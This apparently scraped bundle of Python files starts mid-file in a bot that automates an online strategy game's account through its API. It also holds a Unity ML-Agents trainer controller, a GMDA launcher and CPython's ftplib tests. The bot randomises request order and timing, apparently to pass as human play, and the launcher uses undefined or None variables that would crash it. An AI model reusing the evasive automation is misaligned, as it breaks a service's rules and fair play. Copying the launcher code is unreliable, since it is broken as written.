OBJECT_CODE_GOBLIN,
OBJECT_CODE_GOLEM,
OBJECT_CODE_SKELETON,
OBJECT_CODE_ORC
):
self._on_field_objects_monster(each_obj)
except OtherException as error_code:
if str(error_code) in ('full_task', 'not_enough_troop'):
logger.warning(f'on_field_objects: {error_code}, skip')
return
raise
sio.connect(url, transports=["websocket"])
sio.emit('/field/enter', {'token': self.access_token})
while self._is_march_limit_exceeded():
nearest_end_time = sorted(self.troop_queue, key=lambda x: x.get('endTime'))[0].get('endTime')
seconds = self.calc_time_diff_in_seconds(nearest_end_time)
logger.info(f'_is_march_limit_exceeded: wait {seconds} seconds')
time.sleep(seconds)
self._update_march_limit()
for zone_id in zones:
if not sio.connected:
logger.warning('socf_thread disconnected, reconnecting')
raise tenacity.TryAgain()
sio.emit('/zone/enter/list', {'world': world, 'zones': json.dumps([zone_id])})
time.sleep(random.uniform(1, 2))
sio.emit('/zone/leave/list', {'world': world, 'zones': json.dumps([zone_id])})
logger.info('a loop is finished')
sio.disconnect()
sio.wait()
@tenacity.retry(
stop=tenacity.stop_after_attempt(4),
wait=tenacity.wait_random_exponential(multiplier=1, max=60),
reraise=True
)
def socc_thread(self):
url = self.kingdom_enter.get('networks').get('chats')[0]
sio = socketio.Client(reconnection=False, logger=builtin_logger, engineio_logger=builtin_logger)
sio.connect(url, transports=["websocket"])
sio.emit('/chat/enter', {'token': self.access_token})
# do nothing
sio.wait()
def harvester(self):
"""
收获资源
:return:
"""
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
random.shuffle(buildings)
harvested_code = set()
for building in buildings:
code = building.get('code')
position = building.get('position')
if code not in HARVESTABLE_CODE:
continue
# 每个种类只需要收获一次, 就会自动收获整个种类下所有资源
if code in harvested_code:
continue
harvested_code.add(code)
self.api.kingdom_resource_harvest(position)
def quest_monitor_thread(self):
"""
任务监控
:return:
"""
quest_list = self.api.quest_list()
# main quest(currently only one)
[self.api.quest_claim(q) for q in quest_list.get('mainQuests') if q.get('status') == STATUS_FINISHED]
# side quest(max 5)
if len([self.api.quest_claim(q) for q in quest_list.get('sideQuests') if
q.get('status') == STATUS_FINISHED]) >= 5:
# 若五个均为已完成, 则翻页
threading.Thread(target=self.quest_monitor_thread).start()
return
quest_list_daily = self.api.quest_list_daily().get('dailyQuest')
# daily quest(max 5)
if len([self.api.quest_claim_daily(q) for q in quest_list_daily.get('quests') if
q.get('status') == STATUS_FINISHED]) >= 5:
# 若五个均为已完成, 则翻页
threading.Thread(target=self.quest_monitor_thread).start()
return
# daily quest reward
[self.api.quest_claim_daily_level(q) for q in quest_list_daily.get('rewards') if
q.get('status') == STATUS_FINISHED]
# event
event_list = self.api.event_list()
event_has_red_dot = [each for each in event_list.get('events') if each.get('reddot') > 0]
for event in event_has_red_dot:
event_info = self.api.event_info(event.get('_id'))
finished_code = [
each.get('code') for each in event_info.get('eventKingdom').get('events')
if each.get('status') == STATUS_FINISHED
]
if not finished_code:
continue
[self.api.event_claim(
event_info.get('event').get('_id'), each.get('_id'), each.get('code')
) for each in event_info.get('event').get('events') if each.get('code') in finished_code]
logger.info('quest_monitor: done, sleep for 1h')
threading.Timer(3600, self.quest_monitor_thread).start()
return
def building_farmer_thread(self, task_code=TASK_CODE_SILVER_HAMMER):
"""
building farmer
:param task_code:
:return:
"""
if task_code == TASK_CODE_GOLD_HAMMER and not self.has_additional_building_queue:
return
current_tasks = self.api.kingdom_task_all().get('kingdomTasks', [])
worker_used = [t for t in current_tasks if t.get('code') == task_code]
if worker_used:
threading.Timer(
self.calc_time_diff_in_seconds(worker_used[0].get('expectedEnded')),
self.building_farmer_thread,
[task_code]
).start()
return
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
kingdom_level = [b for b in buildings if b.get('code') == BUILDING_CODE_MAP['castle']][0].get('level')
# First check if there is any empty position available for building
for level_requirement, positions in BUILD_POSITION_UNLOCK_MAP.items():
if kingdom_level < level_requirement:
continue
for position in positions:
if position.get('position') in [building.get('position') for building in buildings]:
continue
building = {
'code': position.get('code'),
'position': position.get('position'),
'level': 0,
'state': BUILDING_STATE_NORMAL,
}
res = self._upgrade_building(building, buildings, task_code)
if res == 'continue':
continue
if res == 'break':
break
return
# Then check if there is any upgradeable building
for building in buildings:
res = self._upgrade_building(building, buildings, task_code)
if res == 'continue':
continue
if res == 'break':
break
return
logger.info('building_farmer: no building to upgrade, sleep for 2h')
threading.Timer(2 * 3600, self.building_farmer_thread, [task_code]).start()
return
def academy_farmer_thread(self, to_max_level=False):
"""
research farmer
:param to_max_level:
:return:
"""
current_tasks = self.api.kingdom_task_all().get('kingdomTasks', [])
worker_used = [t for t in current_tasks if t.get('code') == TASK_CODE_ACADEMY]
if worker_used:
if worker_used[0].get('status') != STATUS_CLAIMED:
threading.Timer(
self.calc_time_diff_in_seconds(worker_used[0].get('expectedEnded')),
self.academy_farmer_thread,
[to_max_level]
).start()
return
# 如果已完成, 则领取奖励并继续
self.api.kingdom_task_claim(BUILDING_POSITION_MAP['academy'])
exist_researches = self.api.kingdom_academy_research_list().get('researches', [])
buildings = self.kingdom_enter.get('kingdom', {}).get('buildings', [])
academy_level = [b for b in buildings if b.get('code') == BUILDING_CODE_MAP['academy']][0].get('level')
for category_name, each_category in RESEARCH_CODE_MAP.items():
logger.info(f'start researching category: {category_name}')
for research_name, research_code in each_category.items():
if not self._is_researchable(
academy_level, category_name, research_name, exist_researches, to_max_level
):
continue
try:
res = self.api.kingdom_academy_research({'code': research_code})
except OtherException as error_code:
if str(error_code) == 'not_enough_condition':
logger.warning(f'category {category_name} reached max level')
break
logger.info(f'research failed, try next one, current: {research_name}({research_code})')
continue
threading.Timer(
self.calc_time_diff_in_seconds(res.get('newTask').get('expectedEnded')),
self.academy_farmer_thread,
[to_max_level]
).start()
return
logger.info('academy_farmer: no research to do, sleep for 2h')
threading.Timer(2 * 3600, self.academy_farmer_thread, [to_max_level]).start()
return
def free_chest_farmer_thread(self, _type=0):
"""
领取免费宝箱
:return:
"""
try:
res = self.api.item_free_chest(_type)
except OtherException as error_code:
if str(error_code) == 'free_chest_not_yet':
logger.info('free_chest_farmer: free_chest_not_yet, sleep for 2h')
threading.Timer(2 * 3600, self.free_chest_farmer_thread).start()
return
raise
next_gold = arrow.get(res.get('freeChest', {}).get('gold', {}).get('next'))
next_silver = arrow.get(res.get('freeChest', {}).get('silver', {}).get('next'))
if next_gold < next_silver:
threading.Timer(self.calc_time_diff_in_seconds(next_gold), self.free_chest_farmer_thread, [1]).start()
else:
threading.Timer(self.calc_time_diff_in_seconds(next_silver), self.free_chest_farmer_thread, [0]).start()
def use_resource_in_item_list(self):
"""
:return:
"""
item_list = self.api.item_list().get('items', [])
if not item_list:
return
usable_item_list = filter(lambda x: x.get('code') in USABLE_ITEM_CODE_LIST, item_list)
for each_item in usable_item_list:
self.api.item_use(each_item.get('code'), each_item.get('amount'))
time.sleep(random.randint(1, 3))
def vip_chest_claim(self):
"""
领取vip宝箱
daily
:return:
"""
vip_info = self.api.kingdom_vip_info()
if vip_info.get('vip', {}).get('isClaimed'):
return
self.api.kingdom_vip_claim()
def alliance_farmer(self):
if not self.kingdom_enter.get('kingdom', {}).get('allianceId'):
return
self._alliance_help_all()
self._alliance_research_donate_all()
self._alliance_shop_autobuy()
def caravan_farmer(self):
caravan = self.api.kingdom_caravan_list().get('caravan')
if not caravan:
return
for each_item in caravan.get('items', []):
if each_item.get('amount') < 1:
continue
if each_item.get('code') not in BUYABLE_CARAVAN_ITEM_CODE_LIST:
continue
if each_item.get('costItemCode') not in BUYABLE_CARAVAN_ITEM_CODE_LIST:
continue
resource_index = get_resource_index_by_item_code(each_item.get('costItemCode'))
if resource_index == -1:
continue
if each_item.get('cost') > self.resources[resource_index]:
continue
self.api.kingdom_caravan_buy(each_item.get('_id'))
def mail_claim(self):
self.api.mail_claim_all()
def wall_repair(self):
wall_info = self.api.kingdom_wall_info()
max_durability = wall_info.get('wall', {}).get('maxDurability')
durability = wall_info.get('wall', {}).get('durability')
last_repair_date = wall_info.get('wall', {}).get('lastRepairDate')
if not last_repair_date:
return
last_repair_date = arrow.get(last_repair_date)
last_repair_diff = arrow.utcnow() - last_repair_date
if durability >= max_durability:
return
if int(last_repair_diff.total_seconds()) < 60 * 30:
# 30 minute interval
return
self.api.kingdom_wall_repair()
def hospital_recover(self):
try:
self.api.kingdom_hospital_recover()
except OtherException:
pass
def keepalive_request(self):
run_functions_in_random_order(
self.api.kingdom_wall_info,
self.api.quest_main,
self.api.item_list,
self.api.kingdom_treasure_list,
self.api.event_list,
self.api.event_cvc_open,
self.api.event_roulette_open,
self.api.pkg_recommend,
self.api.pkg_list,
)
|
trainer_controller.py
|
# # Unity ML-Agents Toolkit
# ## ML-Agent Learning
"""Launches trainers for each External Brains in a Unity Environment."""
import os
import sys
import threading
from typing import Dict, Optional, Set, List
from collections import defaultdict
import numpy as np
from mlagents.tf_utils import tf
from mlagents_envs.logging_util import get_logger
from mlagents.trainers.env_manager import EnvManager
from mlagents_envs.exception import (
UnityEnvironmentException,
UnityCommunicationException,
)
from mlagents.trainers.sampler_class import SamplerManager
from mlagents_envs.timers import hierarchical_timer, timed
from mlagents.trainers.trainer import Trainer
from mlagents.trainers.meta_curriculum import MetaCurriculum
from mlagents.trainers.trainer_util import TrainerFactory
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.agent_processor import AgentManager
class TrainerController(object):
def __init__(
self,
trainer_factory: TrainerFactory,
output_path: str,
run_id: str,
save_freq: int,
meta_curriculum: Optional[MetaCurriculum],
train: bool,
training_seed: int,
sampler_manager: SamplerManager,
resampling_interval: Optional[int],
):
"""
:param output_path: Path to save the model.
:param summaries_dir: Folder to save training summaries.
:param run_id: The sub-directory name for model and summary statistics
:param save_freq: Frequency at which to save model
:param meta_curriculum: MetaCurriculum object which stores information about all curricula.
:param train: Whether to train model, or only run inference.
:param training_seed: Seed to use for Numpy and Tensorflow random number generation.
:param sampler_manager: SamplerManager object handles samplers for resampling the reset parameters.
:param resampling_interval: Specifies number of simulation steps after which reset parameters are resampled.
:param threaded: Whether or not to run trainers in a separate thread. Disable for testing/debugging.
"""
self.trainers: Dict[str, Trainer] = {}
self.brain_name_to_identifier: Dict[str, Set] = defaultdict(set)
self.trainer_factory = trainer_factory
self.output_path = output_path
self.logger = get_logger(__name__)
self.run_id = run_id
self.save_freq = save_freq
self.train_model = train
self.meta_curriculum = meta_curriculum
self.sampler_manager = sampler_manager
self.resampling_interval = resampling_interval
self.ghost_controller = self.trainer_factory.ghost_controller
self.trainer_threads: List[threading.Thread] = []
self.kill_trainers = False
np.random.seed(training_seed)
tf.set_random_seed(training_seed)
def _get_measure_vals(self):
brain_names_to_measure_vals = {}
if self.meta_curriculum:
for (
brain_name,
curriculum,
) in self.meta_curriculum.brains_to_curricula.items():
# Skip brains that are in the metacurriculum but no trainer yet.
if brain_name not in self.trainers:
continue
if curriculum.measure == "progress":
measure_val = self.trainers[brain_name].get_step / float(
self.trainers[brain_name].get_max_steps
)
brain_names_to_measure_vals[brain_name] = measure_val
elif curriculum.measure == "reward":
measure_val = np.mean(self.trainers[brain_name].reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
else:
for brain_name, trainer in self.trainers.items():
measure_val = np.mean(trainer.reward_buffer)
brain_names_to_measure_vals[brain_name] = measure_val
return brain_names_to_measure_vals
@timed
def _save_model(self):
"""
Saves current model to checkpoint folder.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].save_model(name_behavior_id)
self.logger.info("Saved Model")
def _save_model_when_interrupted(self):
self.logger.info(
"Learning was interrupted. Please wait while the graph is generated."
)
self._save_model()
def _export_graph(self):
"""
Exports latest saved models to .nn format for Unity embedding.
"""
for brain_name in self.trainers.keys():
for name_behavior_id in self.brain_name_to_identifier[brain_name]:
self.trainers[brain_name].export_model(name_behavior_id)
@staticmethod
def _create_output_path(output_path):
try:
if not os.path.exists(output_path):
os.makedirs(output_path)
except Exception:
raise UnityEnvironmentException(
f"The folder {output_path} containing the "
"generated model could not be "
"accessed. Please make sure the "
"permissions are set correctly."
)
@timed
def _reset_env(self, env: EnvManager) -> None:
"""Resets the environment.
Returns:
A Data structure corresponding to the initial reset state of the
environment.
"""
sampled_reset_param = self.sampler_manager.sample_all()
new_meta_curriculum_config = (
self.meta_curriculum.get_config() if self.meta_curriculum else {}
)
sampled_reset_param.update(new_meta_curriculum_config)
env.reset(config=sampled_reset_param)
def _should_save_model(self, global_step: int) -> bool:
return (
global_step % self.save_freq == 0 and global_step != 0 and self.train_model
)
def _not_done_training(self) -> bool:
return (
any(t.should_still_train for t in self.trainers.values())
or not self.train_model
) or len(self.trainers) == 0
def _create_trainer_and_manager(
self, env_manager: EnvManager, name_behavior_id: str
) -> None:
parsed_behavior_id = BehaviorIdentifiers.from_name_behavior_id(name_behavior_id)
brain_name = parsed_behavior_id.brain_name
trainerthread = None
try:
trainer = self.trainers[brain_name]
except KeyError:
trainer = self.trainer_factory.generate(brain_name)
self.trainers[brain_name] = trainer
if trainer.threaded:
# Only create trainer thread for new trainers
trainerthread = threading.Thread(
target=self.trainer_update_func, args=(trainer,), daemon=True
)
self.trainer_threads.append(trainerthread)
policy = trainer.create_policy(
parsed_behavior_id, env_manager.external_brains[name_behavior_id]
)
trainer.add_policy(parsed_behavior_id, policy)
agent_manager = AgentManager(
policy,
name_behavior_id,
trainer.stats_reporter,
trainer.parameters.get("time_horizon", sys.maxsize),
threaded=trainer.threaded,
)
env_manager.set_agent_manager(name_behavior_id, agent_manager)
env_manager.set_policy(name_behavior_id, policy)
self.brain_name_to_identifier[brain_name].add(name_behavior_id)
trainer.publish_policy_queue(agent_manager.policy_queue)
trainer.subscribe_trajectory_queue(agent_manager.trajectory_queue)
# Only start new trainers
if trainerthread is not None:
trainerthread.start()
def _create_trainers_and_managers(
self, env_manager: EnvManager, behavior_ids: Set[str]
) -> None:
for behavior_id in behavior_ids:
self._create_trainer_and_manager(env_manager, behavior_id)
@timed
def start_learning(self, env_manager: EnvManager) -> None:
self._create_output_path(self.output_path)
tf.reset_default_graph()
global_step = 0
last_brain_behavior_ids: Set[str] = set()
try:
# Initial reset
self._reset_env(env_manager)
while self._not_done_training():
external_brain_behavior_ids = set(env_manager.external_brains.keys())
new_behavior_ids = external_brain_behavior_ids - last_brain_behavior_ids
self._create_trainers_and_managers(env_manager, new_behavior_ids)
last_brain_behavior_ids = external_brain_behavior_ids
n_steps = self.advance(env_manager)
for _ in range(n_steps):
global_step += 1
self.reset_env_if_ready(env_manager, global_step)
if self._should_save_model(global_step):
self._save_model()
# Stop advancing trainers
self.kill_trainers = True
# Final save Tensorflow model
if global_step != 0 and self.train_model:
self._save_model()
except (
KeyboardInterrupt,
UnityCommunicationException,
UnityEnvironmentException,
) as ex:
self.kill_trainers = True
if self.train_model:
self._save_model_when_interrupted()
if isinstance(ex, KeyboardInterrupt):
pass
else:
# If the environment failed, we want to make sure to raise
# the exception so we exit the process with an return code of 1.
raise ex
if self.train_model:
self._export_graph()
def end_trainer_episodes(
self, env: EnvManager, lessons_incremented: Dict[str, bool]
) -> None:
self._reset_env(env)
# Reward buffers reset takes place only for curriculum learning
# else no reset.
for trainer in self.trainers.values():
trainer.end_episode()
for brain_name, changed in lessons_incremented.items():
if changed:
self.trainers[brain_name].reward_buffer.clear()
def reset_env_if_ready(self, env: EnvManager, steps: int) -> None:
if self.meta_curriculum:
# Get the sizes of the reward buffers.
reward_buff_sizes = {
k: len(t.reward_buffer) for (k, t) in self.trainers.items()
}
# Attempt to increment the lessons of the brains who
# were ready.
lessons_incremented = self.meta_curriculum.increment_lessons(
self._get_measure_vals(), reward_buff_sizes=reward_buff_sizes
)
else:
lessons_incremented = {}
# If any lessons were incremented or the environment is
# ready to be reset
meta_curriculum_reset = any(lessons_incremented.values())
# Check if we are performing generalization training and we have finished the
# specified number of steps for the lesson
generalization_reset = (
not self.sampler_manager.is_empty()
and (steps != 0)
and (self.resampling_interval)
and (steps % self.resampling_interval == 0)
)
ghost_controller_reset = self.ghost_controller.should_reset()
if meta_curriculum_reset or generalization_reset or ghost_controller_reset:
self.end_trainer_episodes(env, lessons_incremented)
@timed
def advance(self, env: EnvManager) -> int:
# Get steps
with hierarchical_timer("env_step"):
num_steps = env.advance()
# Report current lesson
if self.meta_curriculum:
for brain_name, curr in self.meta_curriculum.brains_to_curricula.items():
if brain_name in self.trainers:
self.trainers[brain_name].stats_reporter.set_stat(
"Environment/Lesson", curr.lesson_num
)
for trainer in self.trainers.values():
if not trainer.threaded:
with hierarchical_timer("trainer_advance"):
trainer.advance()
return num_steps
def trainer_update_func(self, trainer: Trainer) -> None:
while not self.kill_trainers:
with hierarchical_timer("trainer_advance"):
trainer.advance()
|
main.py
|
#!/usr/bin/env python3.6
"""
This file contains various wrappers and functions that ease the code digestion and programming in general.
.. module:: main
:platform: linux
.. moduleauthor:: Ivan Syzonenko <is2k@mtmail.mtsu.edu>
"""
__license__ = "MIT"
__docformat__ = 'reStructuredText'
import multiprocessing
import os
from GMDA_main import GMDA_main
from threaded_funcs import threaded_db_input, threaded_print # ,threaded_copy, threaded_rm
# from helper_funcs import get_previous_runs_info
def main():
"""This function is basically a launcher
Parallel threads did not result in a much better performance and was masked for better times.
However, if you decide to implement C++ parallel I/O - it should help.
"""
# Compilation steps:
# compile latest gcc
# compile gromacs with shared libs and static libs, without mpi; install
# compile mdsctk
# OPTIONAL: compile gromacs with mpi/openmp if needed.
tot_seeds = 4
# get_db_con(tot_seeds=4)
past_dir = os.path.join(os.getcwd(), 'past/')
#
# PRINT_LOCK = Lock()
# COPY_LOCK = Lock()
# RM_LOCK = Lock()
# print_queue = queue.Queue()
# printing_thread = Thread(target=threaded_print, args=(print_queue,))
# printing_thread.start()
# db_input_queue = queue.Queue()
# db_input_thread = Thread(target=threaded_db_input, args=(db_input_queue, tot_seeds,))
# db_input_thread.start()
# # db_input_queue.put(None)
#
# copy_queue = queue.Queue()
# copy_thread = Thread(target=threaded_copy, args=(copy_queue,))
# copy_thread.start()
#
# rm_queue = queue.Queue()
# rm_thread = Thread(target=threaded_rm, args=(rm_queue, RM_LOCK,))
# rm_thread.start()
# prev_runs_files = get_previous_runs_info(past_dir)
# print_queue = multiprocessing.JoinableQueue(102400)
# printing_thread = multiprocessing.Process(target=threaded_print, args=(print_queue,))
# printing_thread.start()
print_queue = None
db_input_queue = multiprocessing.JoinableQueue(102400)
db_input_thread = multiprocessing.Process(target=threaded_db_input, args=(db_input_queue, tot_seeds,))
db_input_thread.start()
# no need in the next queues. Maybe helpful if working with /dev/shm
# copy_queue = None
# copy_queue = multiprocessing.Queue()
# copy_thread = multiprocessing.Process(target=threaded_copy, args=(copy_queue,))
# copy_thread.start()
# rm_queue = None
# rm_queue = multiprocessing.JoinableQueue(3)
# rm_thread = multiprocessing.Process(target=threaded_rm, args=(rm_queue,))
# rm_thread.start()
GMDA_main(past_dir, print_queue, db_input_queue, tot_seeds)
# GMDA_main(prev_runs_files, past_dir, print_queue, db_input_queue, copy_queue, rm_queue, tot_seeds)
print_queue.put_nowait(None)
db_input_queue.put_nowait(None)
printing_thread.join()
db_input_thread.join()
print('The last line of the program.')
# rm_queue.put_nowait(None)
# print_queue.join()
# db_input_queue.join()
# rm_queue.join()
if __name__ == "__main__":
main()
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class and IPv6 environment
import ftplib
import threading
import asyncore
import asynchat
import socket
import StringIO
from unittest import TestCase
from test import test_support
from test.test_support import HOST
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
self.baseclass.push('226 transfer complete')
self.close()
class DummyFTPHandler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=2)
self.dtp = DummyDTPHandler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(2)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = DummyDTPHandler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
self.dtp.push(RETR_DATA)
self.dtp.close_when_done()
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accept(self):
conn, addr = self.accept()
self.handler = self.handler(conn)
self.close()
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=2)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
